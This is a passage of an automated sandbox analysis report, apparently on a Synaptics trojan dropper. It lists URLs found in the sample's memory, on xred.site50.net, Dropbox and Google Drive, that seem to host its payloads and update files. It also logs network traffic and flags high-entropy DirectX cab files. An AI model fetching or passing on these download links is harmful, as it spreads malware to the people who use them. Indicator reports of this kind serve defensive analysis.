                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                          Source: file.exeString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                          Source: file.exeString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarh
                          Source: Synaptics.exe, 00000003.00000003.2733811856.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2756588273.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2745845136.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                          Source: Synaptics.exe, 00000003.00000003.2733811856.0000000000779000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2745845136.000000000077D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/.
                          Source: Synaptics.exe, 00000003.00000002.3900442657.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/ta
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                          Source: file.exeString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                          Source: file.exeString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                          Source: Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2701819372.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                          Source: Synaptics.exe, 00000003.00000003.2745845136.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogletagservices-cn.com
                          Source: Synaptics.exe, 00000003.00000003.2756588273.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.0000000000777000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                          Source: ~DF26C05A2AD06F381B.TMP.5.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                          Source: Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/~
                          Source: Synaptics.exe, 00000003.00000003.2723135790.0000000000784000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.go
                          Source: Synaptics.exe, 00000003.00000003.2745845136.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2723135790.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2756588273.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2733811856.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.0000000000777000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                          Source: Synaptics.exe, 00000003.00000003.2745845136.0000000000786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                          Source: Synaptics.exe, 00000003.00000002.3900442657.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                          Source: Synaptics.exe, 00000003.00000003.2745845136.0000000000786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                          Source: Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                          Source: Synaptics.exe, 00000003.00000002.3900442657.0000000000786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download13I
                          Source: Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                          Source: Synaptics.exe, 00000003.00000002.3900442657.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd$
                          Source: Synaptics.exe, 00000003.00000002.3900442657.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                          Source: Synaptics.exe, 00000003.00000003.2745845136.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2723135790.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2756588273.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2733811856.0000000000777000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3900442657.0000000000777000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/q
                          Source: dxwsetup.exe, 00000004.00000003.2183407168.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000004.00000003.2155297064.0000000000CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                          Source: file.exeString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                          Source: file.exeString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlX
                          Source: ~DF26C05A2AD06F381B.TMP.5.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                          Source: Synaptics.exe, 00000003.00000002.3903071669.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:50021 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.5:50022 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:50024 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:50027 version: TLS 1.2

                          Spam, unwanted Advertisements and Ransom Demands

                          barindex
                          Writes many files with high entropy
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45C6EA.tmp\Aug2009_d3dcsx_42_x86.cab entropy: 7.99929609474Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Jun2010_d3dx11_43_x86[1].cab entropy: 7.9918106197Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2010_d3dx10_43_x86.cab entropy: 7.99666344587Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Jun2010_d3dx10_43_x86[1].cab entropy: 7.99666344587Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2010_d3dx9_43_x86.cab entropy: 7.99938038089Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45DFF0.tmp\Jun2010_d3dx9_43_x86.cab entropy: 7.99938038089Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2010_d3dx9_43_x86[1].cab entropy: 7.99938038089Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2009_D3DCompiler_42_x86.cab entropy: 7.99844166401Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45D83F.tmp\Aug2009_D3DCompiler_42_x86.cab entropy: 7.99844166401Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Aug2009_D3DCompiler_42_x86[1].cab entropy: 7.99844166401Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dcsx_42_x86.cab entropy: 7.99929609474Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45E7A1.tmp\Jun2010_d3dx10_43_x86.cab entropy: 7.99666344587Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Feb2005_d3dx9_24_x64.cab entropy: 7.99956721817Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46029B.tmp\Feb2005_d3dx9_24_x64.cab entropy: 7.99956721817Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Feb2005_d3dx9_24_x64[1].cab entropy: 7.99956721817Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2010_D3DCompiler_43_x86.cab entropy: 7.99831524311Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45FA8D.tmp\Jun2010_D3DCompiler_43_x86.cab entropy: 7.99831524311Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2010_D3DCompiler_43_x86[1].cab entropy: 7.99831524311Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2010_d3dcsx_43_x86.cab entropy: 7.99695515494Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45F2EB.tmp\Jun2010_d3dcsx_43_x86.cab entropy: 7.99695515494Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Jun2010_d3dcsx_43_x86[1].cab entropy: 7.99695515494Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2010_d3dx11_43_x86.cab entropy: 7.9918106197Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45ED6D.tmp\Jun2010_d3dx11_43_x86.cab entropy: 7.9918106197Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS461E41.tmp\Aug2005_d3dx9_27_x64.cab entropy: 7.99967199939Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Aug2005_d3dx9_27_x64[1].cab entropy: 7.99967199939Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2005_d3dx9_26_x64.cab entropy: 7.9996191239Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS461568.tmp\Jun2005_d3dx9_26_x64.cab entropy: 7.9996191239Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Jun2005_d3dx9_26_x64[1].cab entropy: 7.9996191239Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2005_d3dx9_25_x64.cab entropy: 7.99971456955Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS460B75.tmp\Apr2005_d3dx9_25_x64.cab entropy: 7.99971456955Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Apr2005_d3dx9_25_x64[1].cab entropy: 7.99971456955Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Feb2006_XACT_x64[1].cab entropy: 7.99567918868Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Feb2006_xact_x86.cab entropy: 7.99214177755Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS463B2F.tmp\Feb2006_xact_x86.cab entropy: 7.99214177755Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Feb2006_XACT_x86[1].cab entropy: 7.99214177755Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Feb2006_d3dx9_29_x64.cab entropy: 7.99967777757Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS463227.tmp\Feb2006_d3dx9_29_x64.cab entropy: 7.99967777757Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Feb2006_d3dx9_29_x64[1].cab entropy: 7.99967777757Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2005_d3dx9_28_x64.cab entropy: 7.9996739284Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS462805.tmp\Dec2005_d3dx9_28_x64.cab entropy: 7.9996739284Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Dec2005_d3dx9_28_x64[1].cab entropy: 7.9996739284Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2005_d3dx9_27_x64.cab entropy: 7.99967199939Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2006_xact_x64.cab entropy: 7.9963671694Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4655FB.tmp\Apr2006_xact_x64.cab entropy: 7.9963671694Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Apr2006_XACT_x64[1].cab entropy: 7.9963671694Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2006_xact_x86.cab entropy: 7.99281124378Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS465000.tmp\Apr2006_xact_x86.cab entropy: 7.99281124378Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Apr2006_xact_x86[1].cab entropy: 7.99281124378Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2006_d3dx9_30_x64.cab entropy: 7.99967825236Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46467A.tmp\Apr2006_d3dx9_30_x64.cab entropy: 7.99967825236Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Apr2006_d3dx9_30_x64[1].cab entropy: 7.99967825236Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Feb2006_xact_x64.cab entropy: 7.99567918868Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4640BD.tmp\Feb2006_xact_x64.cab entropy: 7.99567918868Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS466CA0.tmp\Aug2006_xact_x64.cab entropy: 7.99568599131Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Aug2006_xact_x64[1].cab entropy: 7.99568599131Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2006_xact_x86.cab entropy: 7.99387234818Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS466702.tmp\Aug2006_xact_x86.cab entropy: 7.99387234818Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Aug2006_xact_x86[1].cab entropy: 7.99387234818Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2006_xact_x64.cab entropy: 7.9960175906Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS466117.tmp\Jun2006_xact_x64.cab entropy: 7.9960175906Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\JUN2006_XACT_x64[1].cab entropy: 7.9960175906Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2006_xact_x86.cab entropy: 7.99289442832Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS465B98.tmp\Jun2006_xact_x86.cab entropy: 7.99289442832Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\JUN2006_XACT_x86[1].cab entropy: 7.99289442832Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\DEC2006_d3dx9_32_x64[1].cab entropy: 7.99975750886Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Oct2006_xact_x64.cab entropy: 7.99644077128Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4681BE.tmp\Oct2006_xact_x64.cab entropy: 7.99644077128Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\OCT2006_XACT_x64[1].cab entropy: 7.99644077128Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Oct2006_xact_x86.cab entropy: 7.99419790986Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS467BE2.tmp\Oct2006_xact_x86.cab entropy: 7.99419790986Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\OCT2006_XACT_x86[1].cab entropy: 7.99419790986Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Oct2006_d3dx9_31_x64.cab entropy: 7.99968945572Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46728B.tmp\Oct2006_d3dx9_31_x64.cab entropy: 7.99968945572Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\OCT2006_d3dx9_31_x64[1].cab entropy: 7.99968945572Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2006_xact_x64.cab entropy: 7.99568599131Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46911F.tmp\Dec2006_xact_x86.cab entropy: 7.9939423459Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Dec2006_xact_x86[1].cab entropy: 7.9939423459Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx9_32_x64.cab entropy: 7.99975750886Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46876B.tmp\Dec2006_d3dx9_32_x64.cab entropy: 7.99975750886Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4696FB.tmp\Dec2006_xact_x64.cab entropy: 7.99761851304Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Dec2006_xact_x64[1].cab entropy: 7.99761851304Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Apr2007_d3dx9_33_x64[1].cab entropy: 7.99980407083Jump to dropped file
